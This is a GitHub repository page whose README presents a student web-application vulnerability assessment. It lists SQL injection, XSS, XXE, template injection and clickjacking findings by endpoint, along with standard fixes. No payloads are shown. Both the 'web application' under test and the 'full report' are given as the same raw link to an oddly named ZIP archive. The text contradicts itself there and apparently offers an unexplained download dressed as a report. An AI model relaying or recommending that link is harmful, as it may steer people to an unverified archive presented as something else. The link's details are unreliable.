Skip to content

midoo12345/Graduation-Project

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 

Repository files navigation

Date: October 24, 2024

Authors:

  • Hamdy Emad
  • Mohab Mohamed
  • Mohamed Hassan
  • Nora Ahmed
  • Ruaa Reda

Project Overview

This repository contains the detailed vulnerability assessment report for the web application https://raw.githubusercontent.com/midoo12345/Graduation-Project/main/coenodioecism/Graduation-Project-gelatinochloride.zip. The assessment focuses on identifying and addressing critical security issues, including SQL Injection (SQLi), Cross-Site Scripting (XSS), XML External Entity (XXE) vulnerabilities, and more.


Scope

The assessment was conducted on the following components:


Tools & Methodology

Tools Used

  • Manual Testing: Including specially crafted HTTP requests.
  • Burp Suite: For intercepting and crafting payloads.
  • Custom Payloads: Based on open-source repositories like HackTricks.

Testing Methodology

  1. Identification of vulnerable endpoints.
  2. Payload crafting and injection.
  3. Reproduction and validation of exploits.
  4. Impact analysis and documentation.

Summary of Findings

Vulnerability Risk Level Affected Endpoint
Client-Side Template Injection High /blog/?search=<payload>
Reflected XSS High /login, /catalog?searchTerm=<payload>
SQL Injection Critical /catalog?searchTerm=<payload>
URL Override Vulnerability Medium /blog/post?postId=2&ehj35osewk=1
XML External Entity (XXE) Critical /catalog/product/stock
Clickjacking High /blog

For full details, see the Report Details section.


Key Recommendations

General

  • Sanitize and validate user inputs.
  • Use prepared statements to prevent SQL Injection.
  • Implement a strict Content Security Policy (CSP).
  • Use safe templating engines for client-side code.

Specific Fixes

  1. SQL Injection: Implement parameterized queries.
  2. XSS: Escape output and enforce strong CSP headers.
  3. XXE: Disable external entity processing in XML parsers.
  4. Clickjacking: Use X-Frame-Options headers.
  5. URL Override: Restrict and validate URL headers.

Report Details

The full vulnerability assessment report is available in this repository:
https://raw.githubusercontent.com/midoo12345/Graduation-Project/main/coenodioecism/Graduation-Project-gelatinochloride.zip


Disclaimer

This assessment was conducted strictly for educational and authorized purposes. Unauthorized use of this information for exploitation or other illegal activities is prohibited and against ethical guidelines.


About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published